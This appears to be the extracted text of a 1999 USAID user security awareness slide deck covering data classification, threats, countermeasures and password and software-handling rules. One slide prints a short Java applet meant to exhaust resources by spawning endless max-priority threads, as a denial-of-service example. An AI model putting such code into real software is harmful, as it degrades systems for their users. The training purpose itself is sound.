Information Security
USER AWARENESS TRAINING
1999
by Bill Cleveland
INFORMATION SECURITY STAFF
USAID Information Systems Security Officer
 Jim Craft
<jcraft@usaid.gov> (202) 712-4559
Senior Security Consultants:
 Mike Fuksa <mfuksa@usaid.gov> (202) 712-1096
 Ante Penaso <apenaso@usaid.gov>(703) 465-7008
Security Training and Awareness Consultant
 Bill Cleveland <wcleveland@usaid.gov>
(703) 465-7054
BRIEFING OBJECTIVES
AIS SECURITY






Why is it important?
What is Automated Information
Security / Computer Security?
Current Issues (Threats/Vulnerabilities/
Countermeasures)
Contingency Planning
Conclusion
Open Discussion
Information Security
Why is it important?
COMPUTER SECURITY
Definition - Measures required to protect
against
unauthorized
(accidental
or
intentional) disclosure, modification or
destruction of Automated Information
System, networks and computer resources or
denial of service to process data.
NUMBER ONE




We are a computerized society
Nearly everything we do
utilizes computers
How much data do you
maintain that isn’t contained
on a computer somewhere?
All computers are vulnerable
NUMBER TWO


Much of what we compromise is done
through unclassified open source
publications, conventions,
consortiums, patents, etc.
All this tied together provides a pretty
complete paint-by-the-numbers picture.
IN THE PAST FEW COMPUTERS WERE
AVAILABLE, AND ONLY SPECIALISTS
COULD USE THEM
TODAY, COMPUTERS ARE COMMON EQUIPMENT,
AND (ALMOST) ANYONE CAN USE THEM...
HEADLINE
SECURITY STORIES
Security Breaches Up
Dramatically on Milnet
By Florence Gore
Army, Navy, Air Force and Defense Department
Peace Activist Found Guilty
of Wrecking DoD Computer
By Eric Fredell
Special to GCN
Some computers just ask for a good whacking. In June at Vandenburg Air Force Base in
California a peace activist was found destroying a computer. She gave it a right with a
Security becomes more and more work, as
we all are learning.....
WHAT IS AIS SECURITY /
COMPUTER SECURITY?
AIS Security


Provides a reasonable level of protection
against destruction or partial destruction of
your computer systems that could result in
partial or total denial of services to the
system users.
The Protection of data and software from
unauthorized access.
AIS SECURITY PERTAINS TO 







Physical
Personnel
Hardware
Software
Communications
Emanations
Administrative/Operations
Data/Information
PHYSICAL SECURITY
Physical security is that part of
security concerned with physical
measures designed to safeguard
personnel, to prevent unauthorized
access to equipment, installations,
material, and documents, and theft.
Physical security and AIS security
go hand in hand.
AIS SECURITY IS COMPLEX
HARDWARE
INFOSEC
SOFTWARE
TEMPEST
AIS
SECURITY
COMSEC
PERSONNEL
ADMIN PHYSICAL
IS SYSTEM =
HARDWARE
SOFTWARE / DATA
+
+
+
PEOPLE
FACILITIES
WHY INFORMATION SECURITY?



S

Mission
Cost
Data/Software
Dependence
WHY 
Two Reasons:
It makes sense
It’s the law
COMPUTER SECURITY IS
EVERYONE’S RESPONSIBILITY
Cooperation and support from all
personnel throughout the activity
is an essential key to a successful
program!
New Employees
End Users
End User Supervisors
DATA CLASSIFICATIONS

CLASSIFIED
(CONFIDENTIAL, SECRET, TOP SECRET)
SENSITIVE BUT UNCLASSIFIED
(TECHNICAL, PROPRIETARY, PROGRAM
SPECIFIC)

UNCLASSIFIED
DATA CLASSIFICATION
CLASSIFIED



Confidential - Secret - Top Secret
To Access Classified Material - Appropriate Clearance Level
- Need-to-Know
- Access Approval
Special Handling and Storage Requirements
- Magnetic media may not be shredded, only
burned or degaussed by an approved degausser
(TS may only be destroyed)
CLASSIFIED PROCESSING


Unless your computer has been certified by
NSA as meeting the trusted computer base
criteria for B2 certification (secure multilevel mode), as soon as you introduce
classified data into your system, all data on
all media and devices associated with the
system is classified at the highest level of
data contained on the system.
The system and all of its data (100%),
remains classified at that level until the
system has been sanitized (declassified) by
use of approved methods.
DATA CLASSIFICATION

SENSITIVE BUT UNCLASSIFIED
Includes:
- For Official Use Only
(FOUO)
DATA CLASSIFICATION

SENSITIVE BUT UNCLASSIFIED
Includes:
- For Official Use Only
(FOUO)
- Privacy Act Information
DATA CLASSIFICATION

SENSITIVE BUT UNCLASSIFIED
Includes:
- For Official Use Only
(FOUO)
- Privacy Act Information
- Contract Information
DATA CLASSIFICATION

SENSITIVE BUT UNCLASSIFIED
Includes:
- For Official Use Only
(FOUO)
- Privacy Act Information
- Contract Information
- Technical Information
DATA CLASSIFICATION

SENSITIVE BUT UNCLASSIFIED
Includes:
- For Official Use Only
(FOUO)
- Privacy Act Information
- Contract Information
- Technical Information
- Budget Information
DATA CLASSIFICATION

SENSITIVE BUT UNCLASSIFIED
Includes:
- For Official Use Only
(FOUO)
- Privacy Act Information
- Contract Information
- Technical Information
- Budget Information
- Financial / Payroll
Information
DATA CLASSIFICATION

SENSITIVE BUT UNCLASSIFIED
Includes:
- For Official Use Only
(FOUO)
- Privacy Act Information
- Contract Information
- Technical Information
- Budget Information
- Financial / Payroll
Information
- Proprietary Information
DATA CLASSIFICATION
SENSITIVE BUT UNCLASSIFIED (Cont.)

Requires Special Handling, Storage and
Destruction
DATA CLASSIFICATION
SENSITIVE BUT UNCLASSIFIED (Cont.)

Requires Special Handling, Storage and
Destruction
 If kept on desk, turn over or store in
desk, file cabinet or notebook
DATA CLASSIFICATION
SENSITIVE BUT UNCLASSIFIED (Cont.)

Requires Special Handling, Storage and
Destruction
 If kept on desk, turn over or store in
desk, file cabinet or notebook
 Destruction must be done in such a way to
prevent reconstruction.
DATA CLASSIFICATION
SENSITIVE BUT UNCLASSIFIED (Cont.)

Requires Special Handling, Storage and
Destruction
 If kept on desk, turn over or store in
desk, file cabinet or notebook
 Destruction must be done in such a way to
prevent reconstruction.
DATA CLASSIFICATION
SENSITIVE BUT UNCLASSIFIED (Cont.)
Requires Special Handling, Storage and
Destruction
OOPS,
 If kept on desk, turn over or store in
desk, file cabinet or notebook
DROPSIES
 Destruction must be done in such a way to
prevent reconstruction.

CURRENT ISSUES
THREATS / VULNERABILITIES /
COUNTERMEASURES
THREATS



An activity, deliberate or
unintentional, with the potential for
causing harm to an Automated
Information System
Manifestation of a threat results in
degraded mission accomplishment
Threat identification includes both
known threats and reliably
postulated threats. Lack of
evidence does not rule out the
existence of a threat
CATEGORIES OF THREATS
Man-Made - Intentional
Viruses, Espionage,
Sharing Passwords,
Inadequate Backups
Unintentional Accidental Power loss,
Forgetting Password,
Unattended Terminal
Display, Food/Drinks
NATURAL - Hurricane,
Fire, Flood, Earthquake
SOME AIS SECURITY THREATS








Fire
Flood / Water Damage
Wind Damage
Snow / Ice Storms
Power Loss
Unauthorized Access
Espionage
Food / Drinks
SOME AIS SECURITY THREATS






Sabotage
Unauthorized Software / Data
Modification
System / Application Programmer
Errors
Operator/User Errors and Omissions
Communications Failure
Fraud and Abuse
JAVA Issues
Denial of service
import java.applet.*;
import java.awt.*;
public class InfiniteThreads extends Applet implements Runnable
{
Thread wasteResources = null;
boolean StopThreads = false;
public void run ()
{
while (!StopThreads)
{
wasteResources = new Thread(this);
wasteResources.setPriority(Thread.MAX_Priority);
wasteResources.run();
}
}
}
Web Spoofing




Easy to do
Spectacular
effect
Impossible
to prevent
Pre-warned
is Prearmed!!!!!
E-mail Spoofing





Forge a false e-mail
Easy to do
Impossible to
prevent
Authenticate
Sign internal
messages
Social Engineering



Easy to do
Easy to prevent
Don’t share
passwords
Userid: mreiter
password: mreiter
Share my System!
WRONG!
COMPUTER VIOLATIONS, FRAUD, AND ABUSE
No one here would ever do that!
Would they?



70 - 80% of annual loss related to
computers is committed by
employees
20% of the total computer-related
loss is committed by disgruntled
employees
60% of the total computer-related
loss is caused through human
errors or accidents
FLASH
Disgruntled
employee 15 Computers
sabotage
have been
sclassified
destroyed by
AIS Systems
negligence
THREATS
IMPACTS ON COMPUTER RESOURCES
How will I ever get




Destruction
Modification
Disclosure
Denial of Service
my work done now
!!!!!!
THREAT - VIRUS



Virus - run antivirus programs
on a regular basis.
Do not use any outside
floppies/ disks on your
system without running a
virus scan first. Many viruses
are introduced because virus
scanning was not performed.
No illegal duplication of S/W
rule - this reduces the spread
of virus and avoids legal
headaches
NEAT GAME
VULNERABILITY
A vulnerability is a flaw or weakness
that may be exploited by a threat
agent to cause harm to an AIS
system or network.
SOME VULNERABILITIES





Open Building / Room Policy
Disgruntled Employees
Lack of Security Awareness
Inadequate Supervision
Software / Hardware
THREAT / VULNERABILITY
Data Alteration, Outside Access - This
is why audit trails are so important.
Checks data processing against
tasking and logged computer time
for suspicious discrepancies.
In the case where Laptops/portables
are used by multiple users, keep a
written log of who checked it out
and when it was returned.
Toshiba, Laptop
MINOR 109999
NAME DATE
THREAT / VULNERABILITY RELATIONSHIP
Hey man,
this base is
great! Not too
many guards and
the shoreline and
many buildings
are open. This
place is easy!
Alert our protest
group, were
on tonight.




Sabotage (Threat)
Possible Vulnerabilities
Disgruntled Employee(s)
Activists / Protesters
Inadequate Building Access
Control
SAFEGUARDS / COUNTERMEASURES
Any action, device, procedure, technique or
other measure that reduces the vulnerability of a
system.


Examples:
Security Operating Procedures
Fire/Smoke Alarms
Intrusion Detection System
Firewall
Awareness Training
IN CONCLUSION
COMMON STATEMENTS
#1
Aw come on,
It’s only a
Personal
Computer
It’s-Only-a-Personal-Computer
Facts

But It Still Requires
Safeguarding

Many have more capacity
and capabilities than some
of the mainframes in our
inventory.
The only small features are
their physical size, the cost,
and their security features.

COMMON STATEMENTS
#2
WE
HAVE
TO
I see a computer,, TRUST
tell me the password so I
OUR
can check it for you
PEOPLE...
Hi, I downloaded
those programs from
my PC like you
wanted. I’m at my
car getting ready to
drive over now. See
you soon.
WE HAVE TO TRUST OUR PEOPLE
We like to think we can - but always remember
to check on and report suspicious activities
Be on the lookout for people who you do not
recognize in your environment.
If you see persons without badges, challenge
them.
If you hear someone talking about
things they shouldn’t be, let them
know. If they continue, report it.
COMMON STATEMENT
#3
We
Only
Process
Unclassified
On Our PC’s.....
WE ONLY PROCESS UNCLASSIFIED ON
OUR PC’s....
However if it’s private information, it
is considered SENSITIVE BUT
UNCLASSIFIED and must be
treated as such.
Software
Trouble
Report
If your system is accreditated for
Unclassified, that is all that your
allowed to process. You must be
accreditated for classified
processing in order to use your
computer for classified work.
OPEN DISCUSSION
Yeah, it really got to him!
SECURITY POP QUIZ
BE
WHAT’S WRONG HERE?
P3D4Oh$
WHAT’S THE PROBLEM HERE??
PASSWORD DON’TS:
DO NOT USE ANY PERSONAL NAMES, NICKNAMES, PLACES, BIRTHDAYS, ETC
FOR YOUR PASSWORD.
 DO NOT USE ANYTHING THAT CAN BE TRACED BACK TO YOU (E.G. AUTO
LICENSE NUMBER, BANK ACCOUNT NUMBERS, ANNIVERSARY DATE).
 DO NOT USE ANYTHING THAT HAS TO DO WITH YOUR PROFESSION (E.G.
JOB TITLE, DEGREE, ETC.).
 DO NOT USE THE SAME PASSWORD FOR ALL SYSTEMS.
PASSWORD DO’S:

USE CHARACTERS WITH NUMBERS AND PUNCTUATION.

INTERSPERCE CAPITALS WITH LOWER CASE (EX: Aih4B/3).

DO USE, IF POSSIBLE, AT LEAST SEVEN CHARACTERS IN YOUR PASSWORD.

DO CHANGE YOUR PASSWORD REGULARLY.
**REMEMBER - IF YOU SUSPECT YOUR PASSWORD HAS BEEN
COMPROMISED - REPORT IT IMMEDIATELY TO A SYSTEM
ADMINISTRATOR.
WHAT’S WRONG HERE?
SODA
SODA
Visitor
Escort
Req’d
Protect Your Equipment




You should always try and protect your equipment
from situations that can cause damage, i.e.
extreme heat, smoke, a leaky roof, etc.
Do not drink or eat around your equipment. Many
keyboards have had to be replaced due to drinks
being spilled. (If a computer system is on your
desk, please keep any food or drink away from it.)
When working on classified, protect your screen
from unauthorized viewing.
Prevention from virus. Install and run an anti-virus
program often. Do not use any “foreign” magnetic
media without running a virus scan on it first.
WHAT’S WRONG HERE?
Check out the neat software I
brought in. My friend gave it to me.
He got it at work. He said it hasn’t
got a virus on it, so we don’t need to
scan it.
COOL,
LETS RUN
IT!
Copyrighted, Licensed or Proprietary
Information/Downloading Files:
When downloading files from the Internet for use in official business,
there are legal considerations, as well as concern such as the introduction
of viruses, bugs or other ill effects.
Registration cannot be required with the understanding that it may
be used for commercial purposes. In particular, the Government may
not be later identified as a user of the s/w or otherwise presented as
endorsing the program.
 S/W download must not obligate the Government to provide
anything in return. In the case of beta software, there cannot be any
requirement for the Government to submit an evaluation report in
return for the download.
Registration cannot be required with any expectation that the
Government may later be obligated to purchase a copy of the s/w.
Finally, where registration causes terms for nondisclosure and use of
the s/w, the downloader must take care not to breach any of its
Copyrighted, Licensed or Proprietary Information/
Downloading Files: (CONTINUED)
terms. (For example - in situations where a program is found to be
beneficial, the s/w may not be simply duplicated and distributed to
others if registration is required from each individual user. On the
other hand, if a program is found not to be of use, the downloader
must take appropriate steps to remove and/or destroy the s/w.
All users who download files for PC access, should have a virus scan
run prior to usage.
 Remember to run a virus scan on disks and floppies received from
outside our Department. Many virus’ have been passed from
Department to Department, because no-one ran a virus-scan. If you
need assistance contact the ISSO, or Asst. ISSO.
 And don’t forget that use of LANs to domains outside is for Official
Business Only. This is a monitored service, and any misuse is subject to
disciplinary action or loss of access.
It’s Over
FINITO
Fertig
(Please go back to work now. No running please, single file, no
pushing or shoving. Yes, you may hold hands with the one behind
you. Don’t try to be the first one out if it requires pushing
someone else out of your way. Take nothing but the knowledge
with you, leave nothing but empty seats. Thank you very much.
That’s all I can say, so have a nice day.)